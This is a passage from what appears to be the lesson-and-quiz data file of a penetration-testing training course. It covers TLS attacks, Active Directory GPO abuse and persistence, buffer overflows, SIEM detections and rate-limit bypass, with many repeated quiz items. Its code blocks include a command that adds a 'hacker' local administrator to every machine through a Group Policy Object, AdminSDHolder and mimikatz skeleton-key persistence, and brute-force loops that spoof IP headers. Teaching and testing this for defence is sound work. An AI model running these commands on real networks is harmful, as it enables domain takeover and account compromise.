IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Cloud lateral movement often starts with...","opts":["Physical access","SSRF to metadata + credential chaining","Brute force","Social engineering"],"ans":1},{"type":"quiz","q":"Salt in password hashing prevents...","opts":["Brute force","Rainbow table attacks","All attacks","Dictionary attacks"],"ans":1},{"type":"quiz","q":"TLS replaced which older protocol?","opts":["SSH","SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"PATH hijacking works when a script uses...","opts":["Absolute paths","Relative command names without full paths","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"crypto-tls-attacks","cat":"Cryptography","title":"TLS/SSL Attack Catalog","diff":2,"xp":150,"intro":"BEAST, POODLE, Heartbleed, DROWN, ROBOT \u2014 know the classics.","sections":[{"type":"text","content":"Each TLS attack targets a different weakness: BEAST (CBC IV prediction), POODLE (SSLv3 padding), Heartbleed (OpenSSL buffer over-read), DROWN (SSLv2 cross-protocol), ROBOT (RSA padding oracle)."},{"type":"code","lang":"bash","content":"# Test for all known TLS issues\ntestssl.sh target.com:443\nsslscan target.com\nnmap --script ssl-enum-ciphers -p 443 target.com\n\n# Specific checks:\n# Heartbleed\nnmap --script ssl-heartbleed -p 443 target.com\n# POODLE\nnmap --script ssl-poodle -p 443 target.com\n# Weak ciphers\nopenssl s_client -connect target.com:443 -cipher 'RC4' 2>/dev/null"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Heartbleed was a bug in...","opts":["The TLS protocol","OpenSSL implementation","Apache","Windows SChannel"],"ans":1},{"type":"quiz","q":"SIEM stands for...","opts":["Security Information and Event Management","System Integration and Error Monitoring","Secure Internet Email Manager","Server Infrastructure Event Module"],"ans":0},{"type":"quiz","q":"The goal of threat hunting is...","opts":["Respond to alerts","Proactively find threats that evaded detection","Install patches","Write policies"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"privesc-ad-gpo-abuse","cat":"Privilege Escalation","title":"Active Directory GPO Abuse","diff":3,"xp":250,"intro":"Writable Group Policy Objects let you push code to every machine in the domain.","sections":[{"type":"text","content":"If you have write access to a GPO linked to an OU containing computers or users, you can add a scheduled task, startup script, or software installation that runs on every affected machine."},{"type":"code","lang":"bash","content":"# Find GPOs you can edit\n# In BloodHound: 'Find all GPOs where [user] has GenericAll/GenericWrite'\n\n# Or with PowerView:\nGet-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match 'Write' }\n\n# Abuse: add a scheduled task via GPO\n# Use SharpGPOAbuse\n.SharpGPOAbuse.exe --AddComputerTask --TaskName 'Update' --Author 'NT AUTHORITYSYSTEM' --Command 'cmd.exe' --Arguments '/c net user hacker P@ss /add && net localgroup administrators hacker /add' --GPOName 'Default Domain Policy'"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"GPO abuse is powerful because GPOs...","opts":["Only affect one machine","Push changes to every machine in the linked OU","Require physical access","Are encrypted"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"Infrastructure drift means...","opts":["Moving to a new region","Actual infrastructure diverged from its defined state","Network latency","Container migration"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"network-active-directory-enum","cat":"Network Attacks","title":"Active Directory Enumeration","diff":1,"xp":100,"intro":"Map the domain: users, groups, computers, trusts, and policies.","sections":[{"type":"text","content":"Before attacking AD, enumerate everything: domain users, admin groups, computer accounts, trust relationships, password policies, and service accounts."},{"type":"code","lang":"bash","content":"# From Linux with no creds (null session)\nenum4linux -a dc01.corp.local\n# With creds\ncrackmapexec smb dc01.corp.local -u user -p pass --users\ncrackmapexec smb dc01.corp.local -u user -p pass --groups\n\n# PowerView (from Windows)\nGet-DomainUser | Select samaccountname, description\nGet-DomainGroup -AdminCount | Select name\nGet-DomainComputer | Select dnshostname, operatingsystem\nGet-DomainTrust"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"Why enumerate AD before attacking?","opts":["It's required by law","To map the attack surface and find the shortest path to admin","To fix vulnerabilities","To generate a report"],"ans":1},{"type":"quiz","q":"The shared responsibility model means...","opts":["The cloud provider handles everything","Security is shared between provider and customer","The customer handles everything","No one is responsible"],"ans":1},{"type":"quiz","q":"Instance metadata is accessible at...","opts":["8.8.8.8","127.0.0.1","169.254.169.254","10.0.0.1"],"ans":2},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"exploit-buffer-overflow-practice","cat":"Exploitation","title":"Buffer Overflow: Step-by-Step Practice","diff":1,"xp":100,"intro":"Walk through a complete buffer overflow from crash to shell.","sections":[{"type":"text","content":"The classic sequence: fuzz to crash, find the offset, control EIP/RIP, find bad characters, locate a JMP ESP gadget, generate shellcode, and get a shell."},{"type":"code","lang":"python","content":"# Step 1: Fuzz until crash\nbuf = 'A' * 100\nwhile True:\n    send(buf)\n    buf += 'A' * 100\n\n# Step 2: Find exact offset\n# pattern_create -l 500\n# pattern_offset -l 500 -q <EIP_value>\n\n# Step 3: Verify control\nbuf = 'A' * 112 + 'BBBB'  # EIP should be 42424242\n\n# Step 4: Find bad chars (send 01-FF, check what gets mangled)\n\n# Step 5: Find JMP ESP\n!mona jmp -r esp -cpb 'x00'  # in Immunity Debugger\n\n# Step 6: Final payload\nbuf = 'A'*112 + jmp_esp + nops + shellcode"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"What tool finds the EIP offset from a crash?","opts":["nmap","pattern_offset / cyclic_find","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"defense-siem-use-cases","cat":"Defense & Blue Team","title":"SIEM Detection Use Cases","diff":2,"xp":150,"intro":"The alerts that actually catch attackers \u2014 not just noise.","sections":[{"type":"text","content":"High-value SIEM rules: impossible travel (login from two countries within an hour), service account interactive login, golden ticket indicators (TGT lifetime > 10h), DCSync (replication from non-DC), pass-the-hash (NTLM type 3 without type 1/2)."},{"type":"code","lang":"bash","content":"# Splunk detection examples:\n\n# Impossible travel\nindex=auth action=success | stats earliest(time) as first latest(time) as last values(src_geo) as locations by user | where mvcount(locations) > 1\n\n# DCSync detection (replication from non-DC)\nindex=windows EventCode=4662 Properties=*Replicating Directory Changes* | where NOT match(src, \"DCd+\")\n\n# Pass-the-hash (event 4624 with logon type 9)\nindex=windows EventCode=4624 Logon_Type=9\n\n# Kerberoasting (event 4769 with RC4 encryption)\nindex=windows EventCode=4769 Ticket_Encryption_Type=0x17 | where Service_Name != \"krbtgt\""},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Impossible travel detection flags...","opts":["Slow network connections","Logins from distant locations within a short time","Failed logins","Password changes"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (not encryption, easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"postexploit-ad-persistence","cat":"Post-Exploitation","title":"Active Directory Persistence Techniques","diff":3,"xp":250,"intro":"Stay in the domain even if every password gets reset.","sections":[{"type":"text","content":"AD persistence: Golden Ticket (krbtgt hash), Silver Ticket (service hash), skeleton key (patch LSASS for master password), AdminSDHolder (auto-re-add admin rights), DCShadow (rogue domain controller)."},{"type":"code","lang":"bash","content":"# AdminSDHolder persistence:\n# Objects in AdminSDHolder inherit permissions to all protected groups\n# Add yourself to AdminSDHolder, and every 60 minutes SDProp\n# re-applies those permissions to Domain Admins, Enterprise Admins, etc.\n\n# Even if they remove you from Domain Admins, you get re-added in 60 min\nAdd-DomainObjectAcl -TargetIdentity AdminSDHolder -PrincipalIdentity myuser -Rights All\n\n# Skeleton key: patch LSASS so 'mimikatz' is a master password for any account\nmimikatz# misc::skeleton\n# Now 'mimikatz' works as the password for ANY domain account\n# alongside their real password"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"AdminSDHolder persistence works because...","opts":["It modifies the kernel","SDProp re-applies its ACLs to protected groups every 60 minutes","It changes passwords","It creates new accounts"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"web-rate-limit-bypass","cat":"Web Application","title":"Rate Limit Bypass Techniques","diff":1,"xp":100,"intro":"When brute force is blocked by rate limiting, bypass it.","sections":[{"type":"text","content":"Rate limits often key on IP, session, or a specific header. Bypass by rotating IPs (proxies), changing headers (X-Forwarded-For), using different parameter names, or sending concurrent requests."},{"type":"code","lang":"bash","content":"# Bypass via X-Forwarded-For header rotation\nfor i in $(seq 1 100); do\n  curl -H \"X-Forwarded-For: 10.0.0.$i\" https://target.com/login -d 'user=admin&pass=test'\ndone\n\n# Bypass via IP rotation (proxy list)\nwhile read proxy; do\n  curl -x $proxy https://target.com/login -d 'user=admin&pass=pass123'\ndone < proxies.txt\n\n# Bypass via case variation\n# POST /Login vs /login vs /LOGIN\n# email=Admin@target.com vs admin@target.com"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets 